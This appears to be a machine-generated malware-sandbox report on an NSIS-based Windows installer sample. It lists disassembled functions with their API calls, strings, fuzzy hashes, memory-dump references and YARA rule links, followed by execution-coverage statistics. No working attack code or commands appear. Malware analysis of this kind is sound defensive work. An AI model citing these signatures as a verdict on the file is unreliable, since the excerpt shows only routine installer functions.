                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Window$CallMessageProcSendVisible
                                    • String ID: $@rD
                                    • API String ID: 3748168415-881980237
                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                    Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                    • lstrlenW.KERNEL32 ref: 004026B4
                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                    • String ID: CopyFiles "%s"->"%s"
                                    • API String ID: 2577523808-3778932970
                                    • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                    • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                    Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: lstrcatwsprintf
                                    • String ID: %02x%c$...
                                    • API String ID: 3065427908-1057055748
                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                    Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                    • String ID: Section: "%s"$Skipping section: "%s"
                                    • API String ID: 2266616436-4211696005
                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                    Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(?), ref: 00402100
                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                    • String ID:
                                    • API String ID: 1599320355-0
                                    • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                    • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                    Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                    • String ID: Version
                                    • API String ID: 512980652-315105994
                                    • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                    • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                    • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                    • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                    Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                    • GetTickCount.KERNEL32 ref: 00403303
                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                    • String ID:
                                    • API String ID: 2102729457-0
                                    • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                    • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                    • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                    • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                    Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                    • String ID:
                                    • API String ID: 2883127279-0
                                    • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                    • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                    • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                    • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                    • String ID: HideWindow
                                    • API String ID: 1249568736-780306582
                                    • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                    • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                    Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: PrivateProfileStringlstrcmp
                                    • String ID: !N~
                                    • API String ID: 623250636-529124213
                                    • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                    • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                    • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                    • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                    Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                    Strings
                                    • Error launching installer, xrefs: 00405C48
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: CloseCreateHandleProcess
                                    • String ID: Error launching installer
                                    • API String ID: 3712363035-66219284
                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                    Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: CloseHandlelstrlenwvsprintf
                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                    • API String ID: 3509786178-2769509956
                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                    Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: lstrlen$CharNextlstrcmpi
                                    • String ID:
                                    • API String ID: 190613189-0
                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                    Execution Graph

                                    Execution Coverage:2.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.4%
                                    Total number of Nodes:1782
                                    Total number of Limit Nodes:53
